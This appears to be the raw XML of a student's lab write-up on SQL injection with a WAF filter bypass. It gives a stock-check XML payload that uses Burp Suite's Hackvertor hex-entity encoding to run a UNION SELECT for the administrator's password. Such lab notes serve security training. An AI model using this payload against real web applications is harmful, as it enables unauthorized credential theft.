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33BF" w14:textId="1F076B00" w:rsidR="006B674F" w:rsidRDefault="006B674F" w:rsidP="006B674F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005320DB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19</w:t>
      </w:r>
      <w:r w:rsidRPr="005320DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: SQL injection with filter bypass via XML encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF2D41C" w14:textId="77777777" w:rsidR="006B674F" w:rsidRPr="006B674F" w:rsidRDefault="006B674F" w:rsidP="006B674F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285DBE49" w14:textId="74F9A00E" w:rsidR="006B674F" w:rsidRPr="006B674F" w:rsidRDefault="006B674F" w:rsidP="006B674F">
      <w:r w:rsidRPr="006B674F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:r w:rsidRPr="006B674F">
        <w:br/>
        <w:t>This advanced lab combined SQL injection with XML payloads and encoding tricks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F59B6BC" w14:textId="77777777" w:rsidR="006B674F" w:rsidRPr="006B674F" w:rsidRDefault="006B674F" w:rsidP="006B674F">
      <w:r w:rsidRPr="006B674F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Concepts Covered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC41753" w14:textId="77777777" w:rsidR="006B674F" w:rsidRPr="006B674F" w:rsidRDefault="006B674F" w:rsidP="006B674F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006B674F">
        <w:t>XML-based injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BF9A80" w14:textId="77777777" w:rsidR="006B674F" w:rsidRPr="006B674F" w:rsidRDefault="006B674F" w:rsidP="006B674F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006B674F">
        <w:t xml:space="preserve">Filter bypass using Burp Suite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B674F">
        <w:t>Hackvertor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B674F">
        <w:t xml:space="preserve"> extension (@hex_entities)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1197080E" w14:textId="77777777" w:rsidR="006B674F" w:rsidRPr="006B674F" w:rsidRDefault="006B674F" w:rsidP="006B674F">
      <w:r w:rsidRPr="006B674F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hands-On Practical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D77C903" w14:textId="77777777" w:rsidR="006B674F" w:rsidRPr="0096142E" w:rsidRDefault="006B674F" w:rsidP="006B674F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096142E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Used XML injection with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0096142E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hackverter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0096142E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> extension on Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176740A0" w14:textId="77777777" w:rsidR="006B674F" w:rsidRDefault="006B674F" w:rsidP="006B674F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096142E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0096142E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>stockCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0096142E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0096142E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0096142E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&gt;&lt;@hex_entities&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0096142E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1 UNION SELECT password from users where username ='administrator'--</w:t>
      </w:r>
      <w:r w:rsidRPr="0096142E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;/@hex_entities&gt;&lt;/productId&gt;&lt;storeId&gt;3&lt;/storeId&gt;&lt;/stockCheck&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91DA2B" w14:textId="35DD459F" w:rsidR="001D06AC" w:rsidRDefault="006B674F">
      <w:r w:rsidRPr="001F3B21">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04C4A461" wp14:editId="250D65A1">
            <wp:extent cx="5943600" cy="3089910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="146226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67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C05" w14:textId="77777777" w:rsidR="006B674F" w:rsidRPr="006B674F" w:rsidRDefault="006B674F" w:rsidP="006B674F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B674F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042E74B7" w14:textId="77777777" w:rsidR="006B674F" w:rsidRPr="006B674F" w:rsidRDefault="006B674F" w:rsidP="006B67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74F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Difficulty: Expert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05403E91" w14:textId="77777777" w:rsidR="006B674F" w:rsidRPr="006B674F" w:rsidRDefault="006B674F" w:rsidP="006B674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74F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Status: Completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BF0A48" w14:textId="77777777" w:rsidR="006B674F" w:rsidRDefault="006B674F"/>
    <w:sectPr w:rsidR="006B6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E369B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B7C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60BEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C4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953624">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="151429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AC"/>
    <w:rsid w:val="001D06AC"/>
    <w:rsid w:val="0057577D"/>
    <w:rsid w:val="006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FC45"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{520B91FA-1CC4-4F6E-A7BF-06DDA325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2025-09-06T15:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-06T15:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>